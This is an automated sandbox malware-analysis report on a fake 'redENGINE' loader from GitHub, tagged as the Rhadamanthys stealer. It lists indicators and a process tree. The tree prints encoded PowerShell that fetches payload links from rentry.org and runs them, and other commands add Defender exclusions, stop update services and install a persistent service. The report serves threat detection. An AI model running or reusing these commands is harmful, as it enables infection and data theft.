Analysis
-
max time kernel
133s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
14-06-2024 10:05
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/f4yd1C/redENGINE?tab=readme-ov-file
Resource
win10v2004-20240226-en
General
-
Target
https://github.com/f4yd1C/redENGINE?tab=readme-ov-file
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
4yyvaf3i.iyr2.exeadebj4ig.t3j2.exeavfexwas.ea22.exedescription pid process target process PID 652 created 2820 652 4yyvaf3i.iyr2.exe sihost.exe PID 3476 created 2820 3476 adebj4ig.t3j2.exe sihost.exe PID 2656 created 2820 2656 avfexwas.ea22.exe sihost.exe -
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 131 4184 powershell.exe 133 4184 powershell.exe 135 3976 powershell.exe 136 3976 powershell.exe 137 4508 powershell.exe 138 4508 powershell.exe 140 852 powershell.exe 141 1940 powershell.exe 142 852 powershell.exe 143 1940 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2064 powershell.exe 5468 powershell.exe 4508 powershell.exe 1940 powershell.exe 852 powershell.exe 5204 powershell.exe 5876 powershell.exe 1528 powershell.exe 4184 powershell.exe 3976 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Loader.exeLoader.exeLoader.exeLoader.exeLoader.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Loader.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Loader.exe -
Executes dropped EXE 11 IoCs
Processes:
Loader.exeLoader.exe4yyvaf3i.iyr2.exe4yyvaf3i.iyr3.exeadebj4ig.t3j2.exeadebj4ig.t3j3.exeLoader.exeavfexwas.ea22.exeavfexwas.ea23.exeLoader.exeLoader.exepid process 4556 Loader.exe 2516 Loader.exe 652 4yyvaf3i.iyr2.exe 2900 4yyvaf3i.iyr3.exe 3476 adebj4ig.t3j2.exe 452 adebj4ig.t3j3.exe 2544 Loader.exe 2656 avfexwas.ea22.exe 3064 avfexwas.ea23.exe 3732 Loader.exe 976 Loader.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 19 IoCs
Processes:
flow ioc 44 camo.githubusercontent.com 80 bitbucket.org 81 bitbucket.org 82 bitbucket.org 84 bitbucket.org 142 bitbucket.org 132 bitbucket.org 133 bitbucket.org 138 bitbucket.org 143 bitbucket.org 42 camo.githubusercontent.com 79 bitbucket.org 86 bitbucket.org 151 bitbucket.org 41 camo.githubusercontent.com 136 bitbucket.org 149 bitbucket.org 152 bitbucket.org 154 bitbucket.org -
Drops file in System32 directory 3 IoCs
Processes:
4yyvaf3i.iyr3.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe 4yyvaf3i.iyr3.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
4yyvaf3i.iyr3.exedescription pid process target process PID 2900 set thread context of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe -
Drops file in Program Files directory 2 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Loader\Loader.rar msedge.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Loader\Password.txt msedge.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5276 sc.exe 2544 sc.exe 3360 sc.exe 1136 sc.exe 1520 sc.exe 3940 sc.exe 5500 sc.exe 5324 sc.exe 5916 sc.exe 4824 sc.exe 4788 sc.exe 412 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
7zFM.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings 7zFM.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 3704 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
7zFM.exepowershell.exepowershell.exe4yyvaf3i.iyr2.exeadebj4ig.t3j2.exedialer.exepowershell.exeavfexwas.ea22.exedialer.exe4yyvaf3i.iyr3.exepowershell.exepowershell.exepowershell.exedialer.exepid process 2968 7zFM.exe 2968 7zFM.exe 4184 powershell.exe 4184 powershell.exe 4184 powershell.exe 3976 powershell.exe 3976 powershell.exe 3976 powershell.exe 652 4yyvaf3i.iyr2.exe 652 4yyvaf3i.iyr2.exe 3476 adebj4ig.t3j2.exe 3476 adebj4ig.t3j2.exe 3448 dialer.exe 3448 dialer.exe 3448 dialer.exe 3448 dialer.exe 4508 powershell.exe 4508 powershell.exe 4508 powershell.exe 2656 avfexwas.ea22.exe 2656 avfexwas.ea22.exe 4824 dialer.exe 4824 dialer.exe 4824 dialer.exe 4824 dialer.exe 2900 4yyvaf3i.iyr3.exe 2064 powershell.exe 2064 powershell.exe 2064 powershell.exe 1940 powershell.exe 1940 powershell.exe 852 powershell.exe 852 powershell.exe 1940 powershell.exe 852 powershell.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2900 4yyvaf3i.iyr3.exe 2356 dialer.exe 2356 dialer.exe 2900 4yyvaf3i.iyr3.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe 2356 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes:
7zFM.exe7zFM.exe7zFM.exepid process 2968 7zFM.exe 2100 7zFM.exe 2568 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
7zFM.exe7zFM.exe7zFM.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe4yyvaf3i.iyr3.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeRestorePrivilege 2968 7zFM.exe Token: 35 2968 7zFM.exe Token: SeSecurityPrivilege 2968 7zFM.exe Token: SeSecurityPrivilege 2968 7zFM.exe Token: SeRestorePrivilege 2100 7zFM.exe Token: 35 2100 7zFM.exe Token: SeRestorePrivilege 2568 7zFM.exe Token: 35 2568 7zFM.exe Token: SeSecurityPrivilege 2568 7zFM.exe Token: SeDebugPrivilege 4184 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeDebugPrivilege 2900 4yyvaf3i.iyr3.exe Token: SeDebugPrivilege 2356 dialer.exe Token: SeShutdownPrivilege 3432 powercfg.exe Token: SeCreatePagefilePrivilege 3432 powercfg.exe Token: SeShutdownPrivilege 3972 powercfg.exe Token: SeCreatePagefilePrivilege 3972 powercfg.exe Token: SeShutdownPrivilege 2672 powercfg.exe Token: SeCreatePagefilePrivilege 2672 powercfg.exe Token: SeShutdownPrivilege 3104 powercfg.exe Token: SeCreatePagefilePrivilege 3104 powercfg.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
7zFM.exe7zFM.exe7zFM.exepid process 2968 7zFM.exe 2968 7zFM.exe 2968 7zFM.exe 2100 7zFM.exe 2568 7zFM.exe 2568 7zFM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
7zFM.exeLoader.exeLoader.exepowershell.exepowershell.exe4yyvaf3i.iyr2.exeadebj4ig.t3j2.exeLoader.exepowershell.exeavfexwas.ea22.exeLoader.exeLoader.exe4yyvaf3i.iyr3.execmd.exedialer.exedescription pid process target process PID 2968 wrote to memory of 3704 2968 7zFM.exe NOTEPAD.EXE PID 2968 wrote to memory of 3704 2968 7zFM.exe NOTEPAD.EXE PID 4556 wrote to memory of 4184 4556 Loader.exe powershell.exe PID 4556 wrote to memory of 4184 4556 Loader.exe powershell.exe PID 2516 wrote to memory of 3976 2516 Loader.exe powershell.exe PID 2516 wrote to memory of 3976 2516 Loader.exe powershell.exe PID 4184 wrote to memory of 652 4184 powershell.exe 4yyvaf3i.iyr2.exe PID 4184 wrote to memory of 652 4184 powershell.exe 4yyvaf3i.iyr2.exe PID 4184 wrote to memory of 652 4184 powershell.exe 4yyvaf3i.iyr2.exe PID 4184 wrote to memory of 2900 4184 powershell.exe 4yyvaf3i.iyr3.exe PID 4184 wrote to memory of 2900 4184 powershell.exe 4yyvaf3i.iyr3.exe PID 3976 wrote to memory of 3476 3976 powershell.exe adebj4ig.t3j2.exe PID 3976 wrote to memory of 3476 3976 powershell.exe adebj4ig.t3j2.exe PID 3976 wrote to memory of 3476 3976 powershell.exe adebj4ig.t3j2.exe PID 3976 wrote to memory of 452 3976 powershell.exe adebj4ig.t3j3.exe PID 3976 wrote to memory of 452 3976 powershell.exe adebj4ig.t3j3.exe PID 652 wrote to memory of 3448 652 4yyvaf3i.iyr2.exe dialer.exe PID 652 wrote to memory of 3448 652 4yyvaf3i.iyr2.exe dialer.exe PID 652 wrote to memory of 3448 652 4yyvaf3i.iyr2.exe dialer.exe PID 652 wrote to memory of 3448 652 4yyvaf3i.iyr2.exe dialer.exe PID 652 wrote to memory of 3448 652 4yyvaf3i.iyr2.exe dialer.exe PID 3476 wrote to memory of 3864 3476 adebj4ig.t3j2.exe dialer.exe PID 3476 wrote to memory of 3864 3476 adebj4ig.t3j2.exe dialer.exe PID 3476 wrote to memory of 3864 3476 adebj4ig.t3j2.exe dialer.exe PID 3476 wrote to memory of 3864 3476 adebj4ig.t3j2.exe dialer.exe PID 3476 wrote to memory of 3864 3476 adebj4ig.t3j2.exe dialer.exe PID 2544 wrote to memory of 4508 2544 Loader.exe powershell.exe PID 2544 wrote to memory of 4508 2544 Loader.exe powershell.exe PID 4508 wrote to memory of 2656 4508 powershell.exe avfexwas.ea22.exe PID 4508 wrote to memory of 2656 4508 powershell.exe avfexwas.ea22.exe PID 4508 wrote to memory of 2656 4508 powershell.exe avfexwas.ea22.exe PID 4508 wrote to memory of 3064 4508 powershell.exe avfexwas.ea23.exe PID 4508 wrote to memory of 3064 4508 powershell.exe avfexwas.ea23.exe PID 2656 wrote to memory of 4824 2656 avfexwas.ea22.exe dialer.exe PID 2656 wrote to memory of 4824 2656 avfexwas.ea22.exe dialer.exe PID 2656 wrote to memory of 4824 2656 avfexwas.ea22.exe dialer.exe PID 2656 wrote to memory of 4824 2656 avfexwas.ea22.exe dialer.exe PID 2656 wrote to memory of 4824 2656 avfexwas.ea22.exe dialer.exe PID 3732 wrote to memory of 1940 3732 Loader.exe powershell.exe PID 3732 wrote to memory of 1940 3732 Loader.exe powershell.exe PID 976 wrote to memory of 852 976 Loader.exe powershell.exe PID 976 wrote to memory of 852 976 Loader.exe powershell.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 4188 wrote to memory of 3300 4188 cmd.exe wusa.exe PID 4188 wrote to memory of 3300 4188 cmd.exe wusa.exe PID 2900 wrote to memory of 2356 2900 4yyvaf3i.iyr3.exe dialer.exe PID 2356 wrote to memory of 628 2356 dialer.exe winlogon.exe PID 2356 wrote to memory of 692 2356 dialer.exe lsass.exe PID 2356 wrote to memory of 956 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 336 2356 dialer.exe dwm.exe PID 2356 wrote to memory of 828 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1052 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1096 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1192 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1208 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1264 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1340 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1364 2356 dialer.exe svchost.exe PID 2356 wrote to memory of 1468 2356 dialer.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"3⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/f4yd1C/redENGINE?tab=readme-ov-file2⤵
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\Loader.rar"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\Loader.rar"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr2.exe"C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr2.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr3.exe"C:\Users\Admin\AppData\Roaming\4yyvaf3i.iyr3.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\Desktop\Loader\Loader.exe"C:\Users\Admin\Desktop\Loader\Loader.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4A